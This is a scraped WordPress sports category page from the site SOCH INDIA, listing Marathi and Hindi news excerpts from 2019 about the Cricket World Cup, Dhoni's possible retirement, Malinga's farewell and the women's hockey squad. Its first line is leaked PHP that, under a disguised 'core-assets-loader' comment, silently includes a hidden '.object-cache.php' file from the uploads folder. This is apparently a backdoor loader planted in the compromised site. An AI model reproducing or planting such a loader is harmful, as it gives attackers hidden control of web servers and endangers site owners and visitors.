add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); खेल – SOCH INDIA
Menu

बांगलादेश विरुद्धच्या पहिल्या एकदिवसीय सामन्यात श्रीलंकेने ९१ धावांनी विजय मिळवला. फलंदाज कुशल परेराने केलेल्या शतकी खेळीच्या बळावर श्रीलंकेने ३ सामन्यांच्या मालिकेत १-० अशी आघाडी घेतली. या विजयासह ‘यॉर्कर किंग’ लसिथ मलिंगाने एकदिवसीय क्रिकेट कारकिर्दीचा शेवट गोड केला. तसेच त्याने भारताचा फिरकीपटू अनिल कुंबळे याचा विक्रम मोडत एकदिवसीय क्रिकेटमधून निवृत्ती...

Read More

टोक्यो येथे होणाऱ्या ऑलिम्पिकआधीच्या सराव स्पर्धेकरिता भारतीय महिला हॉकी संघ जाहीर करण्यात आला आहे. सुनीता लाकरा आणि ज्योती या अनुभवी खेळाडूंना संघातून वगळ्यात आले असून युवा खेळाडू शर्मिला देवी आणि रीना खोखार यांना संधी देण्यात आली आहे. हिरोशिमा येथे झालेल्या एफआयएच महिला सीरिज फायनल्स हॉकी स्पर्धेसाठी निवडलेला संघच कायम...

Read More

विराट कोहलीच्या नेतृत्वाखाली भारतीय संघाचं २०१९ विश्वचषक स्पर्धेतलं आव्हान संपुष्टात आलं आहे. उपांत्य सामन्यात केन विल्यमसनच्या न्यूझीलंडने भारतावर १८ धावांनी मात करत अंतिम फेरीत आपलं स्थान निश्चीत केलं आहे. या पराभवाचे पडसाद आता उमटायला लागलेले आहेत. बीसीसीआयची क्रिकेट प्रशासकीय समिती कर्णधार विराट कोहली आणि प्रशिक्षक रवी शास्त्री यांच्याशी पराभवाच्या...

Read More

विराट कोहलीच्या नेतृत्वाखाली भारतीय संघाचं २०१९ विश्वचषक स्पर्धेतलं आव्हान अखेरीस संपुष्टात आलं आहे. न्यूझीलंडच्या संघाने भारतावर १८ धावांनी मात करत अंतिम फेरीत आपलं स्थान निश्चीत केलं. भारतीय संघाच्या या पराभवानंतर साहजिकपणे, पराभवाची कारणं शोधण्याचा प्रयत्न केला जातोय. बीसीसीआयनेही भारतीय संघाच्या कामगिरीची दखल घेतली असून, प्रशिक्षक रवी शास्त्री आणि कर्णधार...

Read More

न्यूझीलंडविरुद्धचा उपांत्य फेरीचा सामना भारताने १८ धावांनी गमावल्यामुळे भारताचे स्पर्धेतील आव्हान संपुष्टात आले. ६ बाद ९२ अशा कठीण स्थितीतून जडेजा आणि धोनी यांची विजयाकडे वाटचाल सुरू होती. मात्र जडेजा झेलबाद झाल्यानंतर ती थांबली. तर निर्णायक क्षणी धोनी मार्टिन गप्टिलच्या थेट फेकीमुळे धावचीत झाला आणि भारताचे विश्वविजेतेपदाचे स्वप्न उद्ध्वस्त झाले....

Read More

आईसीसी क्रिकेट वर्ल्ड कप-2019 (ICC Cricket World Cup 2019) के भारत बनाम बांग्लादेश मैच में टीम इंडिया को चीयर करने वाली 87 साल की बुजुर्ग महिला चारुलता पटेल इंटरनेट सनसनी बनकर उभरी हैं. इस उम्र में क्रिकेट के प्रति उनके जुनून को देखकर कप्तान विराट कोहली भी ‘दादी’ के...

Read More

भारत आज लीडसच्या मैदानात विश्वचषक स्पर्धेतील श्रीलंकेविरुद्ध शेवटचा साखळी सामना खेळणार आहे. भारतीय प्रसारमाध्यमांमध्ये या सामन्यापेक्षा भारताचा अव्वल फलंदाज महेंद्रसिंह धोनीच्या निवृत्तीची चर्चा रंगली आहे. धोनी चौथा वर्ल्डकप खेळत असून ही त्याची शेवटची स्पर्धा आहे असा अंदाज काहीजणांनी वर्तवला आहे. या दरम्यान एबीपी न्यूज चॅनलच्या पत्रकारने धोनीला गाठून त्याला...

Read More

भारतीय संघ विश्वचषक स्पर्धेत दमदार कामगिरी करत असला तरी एका खेळाडूला सतत टीकेचा सामना करावा लागत आहे तो म्हणजे माजी कर्णधार महेंद्रसिंग धोनी. आपल्या संथ खेळीमुळे धोनीवर सतत टीका होत असून निवृत्ती घ्यावी अशी मागणी होत आहे. एकीकडे भारतीय क्रिकेट संघाचा कर्णधार विराट कोहली, प्रशिक्षक रवी शास्त्री धोनीला पाठिंबा...

Read More

भारतीय क्रिकेट संघाचा कर्णधार विराट कोहलीने यंदाच्या विश्वचषक स्पर्धेत अद्यापपर्यंत एकही शतक झळकवलेले नाही. पण विराट कोहलीच आपला सलग चार शतकांचा विक्रम मोडू शकतो असा कुमार संगकाराला विश्वास आहे. ऑस्ट्रेलिया आणि न्यूझीलंडमध्ये झालेल्या २०१५ सालच्या विश्वचषक स्पर्धेत कुमार संगकाराने सलग चार शतके झळकावली होती. उपांत्यपूर्व फेरीत दक्षिण आफ्रिकेकडून श्रीलंकेचे...

Read More